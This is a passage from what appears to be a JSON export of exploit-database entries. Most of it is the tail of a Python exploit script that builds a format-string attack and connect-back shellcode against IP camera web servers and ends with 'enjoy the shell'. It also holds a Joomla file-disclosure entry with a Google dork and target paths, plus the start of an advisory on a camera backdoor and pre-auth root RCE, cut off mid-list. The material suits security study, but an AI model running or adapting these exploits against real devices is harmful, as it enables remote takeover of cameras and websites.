HTTPS for remote connection [Default: HTTP]')\r\n arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')\r\n arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')\r\n arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')\r\n args = arg_parser.parse_args()\r\n except Exception as e:\r\n print INFO,\"\\nError: %s\\n\" % str(e)\r\n sys.exit(1)\r\n \r\n # We want at least one argument, so print out help\r\n if len(sys.argv) == 1:\r\n arg_parser.parse_args(['-h'])\r\n \r\n print \"\\n[*]\",INFO\r\n \r\n if args.verbose:\r\n verbose = args.verbose\r\n \r\n # Print out info from dictionary\r\n if args.dict:\r\n target = FMSdb(rhost,verbose).FMSkey(0)\r\n print \"[db] Number of FMS keys:\",len(target)\r\n \r\n # Print out detailed info from dictionary\r\n if 
verbose:\r\n \r\n print \"[db] Target details of FMS Keys availible for manual xploiting\"\r\n print \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\"\r\n \r\n for tmp in range(0,len(target)):\r\n Key = sorted(target.keys())[tmp]\r\n temp = re.split('[-]',Key)[0:10]\r\n \r\n if temp[1] == 'NCSH':\r\n print Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6]\r\n \r\n print \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\"\r\n for tmp in range(0,len(target)):\r\n Key = sorted(target.keys())[tmp]\r\n temp = re.split('[-]',Key)[0:10]\r\n \r\n if temp[1] != 'NCSH':\r\n print Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6]\r\n \r\n print \"\\n\"\r\n else:\r\n print \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\"\r\n Key = \"\"\r\n for tmp in range(0,len(target)):\r\n Key += sorted(target.keys())[tmp]\r\n Key += ', '\r\n print '\\n',Key,'\\n'\r\n sys.exit(0)\r\n \r\n#\r\n# Check validity, update if needed, of provided options\r\n#\r\n if args.https:\r\n proto = HTTPS\r\n if not args.rport:\r\n rport = '443'\r\n \r\n if creds and args.auth:\r\n creds = args.auth\r\n \r\n if args.noexploit:\r\n noexploit = args.noexploit\r\n \r\n if args.rport:\r\n rport = args.rport\r\n \r\n if args.rhost:\r\n rhost = args.rhost\r\n \r\n if args.lport:\r\n lport = args.lport\r\n \r\n if args.lhost:\r\n lhost = args.lhost\r\n \r\n # Check if LPORT is valid\r\n if not Validate(verbose).Port(lport):\r\n print \"[!] Invalid LPORT - Choose between 1 and 65535\"\r\n sys.exit(1)\r\n \r\n # Check if RPORT is valid\r\n if not Validate(verbose).Port(rport):\r\n print \"[!] 
Invalid RPORT - Choose between 1 and 65535\"\r\n sys.exit(1)\r\n \r\n # Check if LHOST is valid IP or FQDN, get IP back\r\n lhost = Validate(verbose).Host(lhost)\r\n if not lhost:\r\n print \"[!] Invalid LHOST\"\r\n sys.exit(1)\r\n \r\n # Check if RHOST is valid IP or FQDN, get IP back\r\n rhost = Validate(verbose).Host(rhost)\r\n if not rhost:\r\n print \"[!] Invalid RHOST\"\r\n sys.exit(1)\r\n \r\n \r\n#\r\n# Validation done, start print out stuff to the user\r\n#\r\n if noexploit:\r\n print \"[i] Test mode selected, no exploiting...\"\r\n if args.https:\r\n print \"[i] HTTPS / SSL Mode Selected\"\r\n print \"[i] Remote target IP:\",rhost\r\n print \"[i] Remote target PORT:\",rport\r\n print \"[i] Connect back IP:\",lhost\r\n print \"[i] Connect back PORT:\",lport\r\n \r\n rhost = rhost + ':' + rport\r\n \r\n#\r\n# FMS key is required into this PoC\r\n#\r\n if not args.fms:\r\n print \"[!] FMS key is required!\"\r\n sys.exit(1)\r\n else:\r\n Key = args.fms\r\n print \"[i] Trying with FMS key:\",Key\r\n \r\n#\r\n# Prepare exploiting\r\n#\r\n # Look up the FMS key in dictionary and return pointer for FMS details to use\r\n target = FMSdb(rhost,verbose).FMSkey(Key)\r\n \r\n if target[Key][6] == 'NCSH1':\r\n NCSH1 = target[Key][6]\r\n NCSH2 = \"\"\r\n elif target[Key][6] == 'NCSH2':\r\n NCSH2 = target[Key][6]\r\n NCSH1 = \"\"\r\n else:\r\n NCSH1 = \"\"\r\n NCSH2 = \"\"\r\n \r\n if Key == 'ARM-NCSH-5.8x':\r\n print \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\"\r\n sys.exit(0)\r\n \r\n print \"[i] Preparing shellcode:\",str(target[Key][6])\r\n \r\n # We don't use url encoded shellcode with Netcat shell\r\n # This is for MIPS/CRISv32 and ARM shellcode\r\n if not NCSH1 and not NCSH2:\r\n FMSdata = target[Key][4] # This entry aligns the injected shellcode\r\n \r\n # Building up the url encoded shellcode for sending to the target,\r\n # and replacing LHOST / LPORT in shellcode to 
choosen values\r\n \r\n # part of first 500 decoded bytes will be overwritten during stage #2, and since\r\n # there is different 'tailing' on the request internally, keep it little more than needed, to be safe.\r\n # Let it be 0x00, just for fun.\r\n FMSdata += '%00' * target[Key][5]\r\n \r\n # Connect back IP to url encoded\r\n ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))\r\n ip_hex = ip_hex.split()\r\n IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];\r\n \r\n # Let's break apart the hex code of LPORT into two bytes\r\n port_hex = hex(int(lport))[2:]\r\n port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n port_hex = port_hex.split()\r\n \r\n if (target[Key][6]) == 'MIPSel':\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%ff\"\r\n PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%00\"\r\n PP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n elif (target[Key][6]) == 'CRISv32':\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%00\"\r\n PP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n else:\r\n print \"[!] Unknown shellcode! 
(%s)\" % str(target[Key][6])\r\n sys.exit(1)\r\n \r\n # Replace LHOST / LPORT in URL encoded shellcode\r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"IP1\",IP1)\r\n shell = shell.replace(\"IP2\",IP2)\r\n shell = shell.replace(\"IP3\",IP3)\r\n shell = shell.replace(\"IP4\",IP4)\r\n shell = shell.replace(\"PP0\",PP0)\r\n shell = shell.replace(\"PP1\",PP1)\r\n FMSdata += shell\r\n \r\n#\r\n# Calculate the FMS values to be used\r\n#\r\n # Get pre-defined values\r\n ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS\r\n# POP_SIZE = 8\r\n POP_SIZE = 1\r\n \r\n GOThex = target[Key][0]\r\n BSShex = target[Key][1]\r\n GOTint = int(GOThex)\r\n \r\n # 'One-Write-Where-And-What'\r\n if not NCSH1 and not NCSH2:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n \r\n # Calculate for creating the FMS code\r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)\r\n \r\n BSSint = int(BSShex)\r\n BSSint = (BSSint - GOTint - ALREADY_WRITTEN)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint\r\n \r\n # 'Two-Write-Where-And-What' using \"New Style\"\r\n elif NCSH2:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n POP3 = target[Key][4]\r\n POP4 = target[Key][5]\r\n POP2_SIZE = 2\r\n \r\n # We need to count higher than provided address for the jump\r\n BaseAddr = 0x10000 + BSShex\r\n \r\n # Calculate for creating the FMS code\r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint\r\n \r\n # Calculate FirstWhat value\r\n FirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat\r\n \r\n # Calculate SecondWhat value, so it always is 0x20300\r\n SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)\r\n \r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = 
shell.replace(\"LHOST\",lhost)\r\n shell = shell.replace(\"LPORT\",lport)\r\n \r\n FirstWhat = FirstWhat - len(shell)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n \r\n \r\n # 'Two-Write-Where-And-What' using \"Old Style\"\r\n elif NCSH1:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n POP3 = target[Key][4]\r\n POP4 = target[Key][5]\r\n POP2_SIZE = 2\r\n \r\n # FirstWhat writes with 4 bytes (Y) (0x0002YYYY)\r\n # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)\r\n if BSShex > 0x10000:\r\n MSB = 1\r\n else:\r\n MSB = 0\r\n \r\n # We need to count higher than provided address for the jump\r\n BaseAddr = 0x10000 + BSShex\r\n \r\n # Calculate for creating the FMS code\r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n \r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)\r\n \r\n # Calculate FirstWhat value\r\n FirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)\r\n \r\n # Calculate SecondWhat value, so it always is 0x203[00] or [01]\r\n SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB\r\n \r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"LHOST\",lhost)\r\n shell = shell.replace(\"LPORT\",lport)\r\n \r\n GOTint = GOTint - len(shell)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n \r\n else:\r\n print \"[!] 
NCSH missing, exiting\"\r\n sys.exit(1)\r\n#\r\n# Let's start the exploiting procedure\r\n#\r\n \r\n#\r\n# Stage one\r\n#\r\n if NCSH1 or NCSH2:\r\n \r\n # \"New Style\" needs to make the exploit in two stages\r\n if NCSH2:\r\n FMScode = do_FMS(rhost,verbose)\r\n # Writing 'FirstWhere' and 'SecondWhere'\r\n # 1st request\r\n FMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n #\r\n # 1st and 2nd \"Write-Where\"\r\n FMScode.AddDirectParameterN(POP1) # Write 1st Where\r\n FMScode.Add(\"XX\") # Jump up two bytes for next address\r\n FMScode.AddDirectParameterN(POP2) # Write 2nd Where\r\n FMSdata = FMScode.FMSbuild()\r\n else:\r\n FMSdata = \"\"\r\n \r\n print \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n else:\r\n print \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n \r\n # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM\r\n # Actually, any valid and public readable .shtml file will work...\r\n # (One of the two below seems always to be usable)\r\n #\r\n # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two\r\n # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url\r\n #\r\n try:\r\n target_url = \"/httpDisabled.shtml?user_agent=\"\r\n if noexploit:\r\n target_url2 = target_url\r\n else:\r\n target_url2 = \"/httpDisabled.shtml?&http_user=\"\r\n \r\n if NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n except urllib2.HTTPError as e:\r\n if e.code == 404:\r\n print \"[<] Error\",e.code,e.reason\r\n target_url = \"/view/viewer_index.shtml?user_agent=\"\r\n if noexploit:\r\n target_url2 = target_url\r\n else:\r\n target_url2 = 
\"/view/viewer_index.shtml?&http_user=\"\r\n print \"[>] Using alternative target shtml\"\r\n if NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n except Exception as e:\r\n if not NCSH2:\r\n print \"[!] Shellcode delivery failed:\",str(e)\r\n sys.exit(1)\r\n#\r\n# Stage two\r\n#\r\n \r\n#\r\n# Building and sending the FMS code to the target\r\n#\r\n print \"[i] Building the FMS code...\"\r\n \r\n FMScode = do_FMS(rhost,verbose)\r\n \r\n # This is an 'One-Write-Where-And-What' for FMS\r\n #\r\n # Stack Example:\r\n #\r\n # Stack content | Stack address (ASLR)\r\n #\r\n # 0x0 | @0x7e818dbc -> [POP1's]\r\n # 0x0 | @0x7e818dc0 -> [free () GOT address]\r\n # 0x7e818dd0 | @0x7e818dc4>>>>>+ \"Write-Where\" (%n)\r\n # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]\r\n # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]\r\n # 0x76f55ab8 | @0x7e818dd0<<<<<+ \"Write-What\" (%n)\r\n # 0x1 | @0x7e818dd4\r\n #\r\n if not NCSH1 and not NCSH2:\r\n FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's \r\n FMScode.AddADDR(GOTint) # GOT Address\r\n FMScode.AddWRITEn(1) # 4 bytes Write-Where\r\n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n \r\n FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's\r\n FMScode.AddADDR(BSSint) # BSS shellcode address\r\n FMScode.AddWRITEn(1) # 4 bytes Write-What\r\n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n \r\n # End of 'One-Write-Where-And-What'\r\n \r\n \r\n # This is an 'Two-Write-Where-And-What' for FMS\r\n #\r\n # Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" -->\r\n # We jump over all SSI tagging to end up directly where \"xxx\" will\r\n # be the string passed on to SSI exec function ('/bin/sh -c', 
pipe(), vfork() and execv())\r\n #\r\n # The Trick here is to write lower target address, that we will jump to when calling free(),\r\n # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT\r\n # address with two LSB writes.\r\n #\r\n elif NCSH2:\r\n #\r\n # Direct parameter access for FMS exploitation are really nice and easy to use.\r\n # However, we need to exploit in two stages with two requests.\r\n # (I was trying to avoid this \"Two-Stages\" so much as possibly in this exploit developement...)\r\n #\r\n # 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)\r\n # 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" pointing to.\r\n # \r\n # With \"new style\", we can write with POPs independently as we don't depended of same criteria as in \"NCSH1\",\r\n # we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write.\r\n # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]\r\n #\r\n # Stack Example:\r\n #\r\n # Stack content | Stack address (ASLR)\r\n #\r\n # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One]\r\n # 0x76f41fb8 | @0x7e818dc8 |\r\n # 0x76f3d70c | @0x7e818dcc |\r\n # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two]\r\n # 0x1 | @0x7e818dd4\r\n # [....]\r\n # 0x1c154 | @0x7e818e10\r\n # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One]\r\n # 0x76f41fb8 | @0x7e818e18 |\r\n # 0x76f3d70c | @0x7e818e1c |\r\n # 0x76f55758 | @0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two]\r\n # 0x1 | @0x7e818e24\r\n #\r\n \r\n FMScode.Add(shell)\r\n \r\n #\r\n # 1st and 2nd \"Write-Where\" already done in stage one\r\n #\r\n # 1st and 2nd \"Write-What\"\r\n #\r\n FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in 
MSB)\r\n FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n \r\n elif NCSH1:\r\n # Could use direct argument addressing here, but I like to keep \"old style\" as well,\r\n # as it's another interesting concept.\r\n #\r\n # Two matching stack contents -> stack address in row w/o or max two POP's between,\r\n # is needed to write two bytes higher (MSB).\r\n # \r\n #\r\n # Stack Example:\r\n #\r\n # Stack Content | @Stack Address (ASLR)\r\n #\r\n # 0x9c | @7ef2fde8 -> [POP1's]\r\n # [....]\r\n # 0x1 | @7ef2fdec -> [GOTint address]\r\n #------\r\n # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]\r\n # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)\r\n # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]\r\n # ------ | |\r\n # [....] -> [POP3's] | |\r\n # 0x7fb99dc | @7ef2fe7c | |\r\n # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]\r\n # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))\r\n # -> [POP4's] |\r\n # (nil) | @7ef2fe88 | [Count up to 0x20300]\r\n # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)\r\n \r\n FMScode.Add(shell)\r\n \r\n # Write FirstWhere for 'FirstWhat'\r\n FMScode.AddPOP(POP1)\r\n FMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n FMScode.AddWRITEn(1)\r\n \r\n # Write SecondWhere for 'SecondWhat'\r\n #\r\n # This is special POP with 1 byte, we can maximum POP 2!\r\n #\r\n # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement\r\n # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.\r\n # Kept as reference as we now using direct parameter access AKA 'New Style\" for 5.2x/5.4x\r\n #\r\n if POP2 != 0:\r\n # We only want to write 
'SecondWhat' two bytes higher at free() GOT\r\n if POP2 > 2:\r\n print \"POP2 can't be greater than two!\"\r\n sys.exit(1)\r\n if POP2 == 1:\r\n FMScode.Add(\"%2c\")\r\n else:\r\n FMScode.Add(\"%1c%1c\")\r\n else:\r\n FMScode.Add(\"XX\")\r\n FMScode.AddWRITEn(1)\r\n \r\n # Write FirstWhat pointed by FirstWhere\r\n FMScode.AddPOP(POP3) # Old Style POP's\r\n FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)\r\n \r\n # Write SecondWhat pointed by SecondWhere\r\n FMScode.AddPOP(POP4) # Old Style POP's\r\n FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n \r\n else:\r\n sys.exit(1)\r\n \r\n FMSdata = FMScode.FMSbuild()\r\n \r\n print \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata))\r\n \r\n # FMS comes here, and calculations start after '=' in the url\r\n try:\r\n if NCSH1 or NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode\r\n except urllib2.HTTPError as e:\r\n print \"[!] Payload delivery failed:\",str(e)\r\n sys.exit(1)\r\n except Exception as e:\r\n # 1st string returned by HTTP mode, 2nd by HTTPS mode\r\n if str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\":\r\n print \"[i] Timeout! Payload delivered sucessfully!\"\r\n else:\r\n print \"[!] 
Payload delivery failed:\",str(e)\r\n sys.exit(1)\r\n \r\n if noexploit:\r\n print \"\\n[*] Not exploiting, no shell...\\n\"\r\n else:\r\n print \"\\n[*] All done, enjoy the shell...\\n\"\r\n \r\n#\r\n# [EOF]\r\n#\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25439"}], "packetstorm": [{"lastseen": "2018-11-26T10:22:16", "description": "", "published": "2018-11-22T00:00:00", "type": "packetstorm", "title": "Joomla Admin 3.7.4 Database Disclosure", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-22T00:00:00", "id": "PACKETSTORM:150433", "href": "https://packetstormsecurity.com/files/150433/Joomla-Admin-3.7.4-Database-Disclosure.html", "sourceData": "`################################################################################################# \n \n# Exploit Title : Joomla com_admin Components from V2.5.4 to V3.7.4 \nDatabase Backup Arbitrary File Download Vulnerability \n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security \nArmy \n# Date : 19/11/2018 \n# Vendor Homepage : joomla.org \n+ \ngithub.com/joomla-projects/gsoc18_override_management/tree/master/administrator/components/com_admin \n# Tested On : Windows and Linux \n# Category : WebApps \n# Version Information : V2.5.4 - V2.5.6 - V2.5.7 - V3.0.0 3.0.1 \nV3.0. V3.0.3 V3.1.0 V3.1.1 V3.1.2 V3.1.3 V3.1.4 V3.1.5 V3.2.0 V3.2.1 \nV3.4.0 V3.7.4 and if etcetera.... 
\n# Google Dorks : inurl:''/administrator/components/com_admin/sql/'' \n# Exploit Risk : Medium \n# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] \nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] \n \n################################################################################################# \n \n# Admin Panel Login Path : \n \n/administrator \n \n################################################################################################# \n \n# Exploit : \n \nCheck this folders => \n \n/joomla/administrator/components/com_admin/sql/others/mysql/...... \n \n/PATH/PATH/administrator/components/com_admin/sql/others/mysql/...... \n \n/PATH/administrator/components/com_admin/sql/updates/mysql/...... \n \n/administrator/components/com_admin/sql/updates/mysql/...... \n \n/administrator/components/com_admin/sql/updates/postgresql/....... \n \n/administrator/components/com_admin/sql/updates/sqlazure/...... \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql \n \n/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql 
\n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql \n \n################################################################################################# \n \n# Example Vulnerable Sites => 
\n \n################################################################################################# \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n################################################################################################# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150433/jooomlaadmin374-disclose.txt"}, {"lastseen": "2017-03-09T17:15:32", "description": "", "published": "2017-03-09T00:00:00", "type": "packetstorm", "title": "Wireless IP Camera (P2P) WIFICAM GoAhead Backdoor / Remote Command Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-09T00:00:00", "id": "PACKETSTORM:141523", "href": "https://packetstormsecurity.com/files/141523/Wireless-IP-Camera-P2P-WIFICAM-GoAhead-Backdoor-Remote-Command-Execution.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA512 \n \n \n## Advisory Information \n \nTitle: Multiple vulnerabilities found in Wireless IP Camera (P2P) \nWIFICAM cameras and vulnerabilities in GoAhead \nAdvisory URL: https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt \nBlog URL: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nDate published: 2017-03-08 \nVendors contacted: None \nRelease mode: Released \nCVE: no current CVE \n \n \n \n## Product Description \n \nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which \nallows to stream remotely. \n \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \n## Vulnerabilities Summary \n \nThe Wireless IP Camera (P2) WIFICAM is a camera overall badly designed \nwith a lot of vulnerabilities. \nThis camera is very similar to a lot of other Chinese cameras. 
\n \nIt seems that a generic camera is being sold by a Chinese company in \nbulk (OEM) and \nthe buyer companies resell them with custom software development and \nspecific branding. Wireless IP Camera (P2) WIFICAM is one of the \nbranded cameras. \n \nSo, cameras are sold under different names, brands and functions. The HTTP \ninterface is different for each vendor but shares the same vulnerabilities. \n \n \nBecause of code reuse, the vulnerabilities are present in a huge \nlist of cameras (especially the InfoLeak and the RCE), \nwhich allow executing root commands against 1250+ camera models with \na pre-auth vulnerability. \n \n \nThe summary of the vulnerabilities is: \n \n1. Backdoor account \n2. RSA key and certificates \n3. Pre-Auth Info Leak (credentials) within the GoAhead http server \n4. Authenticated RCE as root \n5. Pre-Auth RCE as root \n6. Misc - Streaming without authentication \n7. Misc - \"Cloud\" (Aka Botnet) \n \n \nThe vulnerabilities in the Cloud management affect a lot of P2P or \n\"Cloud\" cameras. \n \nMy tests have shown that the InfoLeak affecting the GoAhead server \nrunning on the camera affects at least 1250+ camera models. It can be \nused to execute the RCE as root. 
\nThus, these cameras are likely affected by a pre-auth RCE as root: \n \n \n3G+IPCam Other \n3SVISION Other \n3com CASA \n3com Other \n3xLogic Other \n3xLogic Radio \n4UCAM Other \n4XEM Other \n555 Other \n7Links 3677 \n7Links 3677-675 \n7Links 3720-675 \n7Links 3720-919 \n7Links IP-Cam-in \n7Links IP-Wi-Fi \n7Links IPC-760HD \n7Links IPC-770HD \n7Links Incam \n7Links Other \n7Links PX-3615-675 \n7Links PX-3671-675 \n7Links PX-3720-675 \n7Links PX3309 \n7Links PX3615 \n7Links ipc-720 \n7Links px-3675 \n7Links px-3719-675 \n7Links px-3720-675 \nA4Tech Other \nABS Other \nADT RC8021W \nAGUILERA AQUILERA \nAJT AJT-019129-BBCEF \nALinking ALC \nALinking Other \nALinking dax \nAMC Other \nANRAN ip180 \nAPKLINK Other \nAQUILA AV-IPE03 \nAQUILA AV-IPE04 \nAVACOM 5060 \nAVACOM 5980 \nAVACOM H5060W \nAVACOM NEW \nAVACOM Other \nAVACOM h5060w \nAVACOM h5080w \nAcromedia IN-010 \nAcromedia Other \nAdvance Other \nAdvanced+home lc-1140 \nAeoss J6358 \nAetos 400w \nAgasio A500W \nAgasio A502W 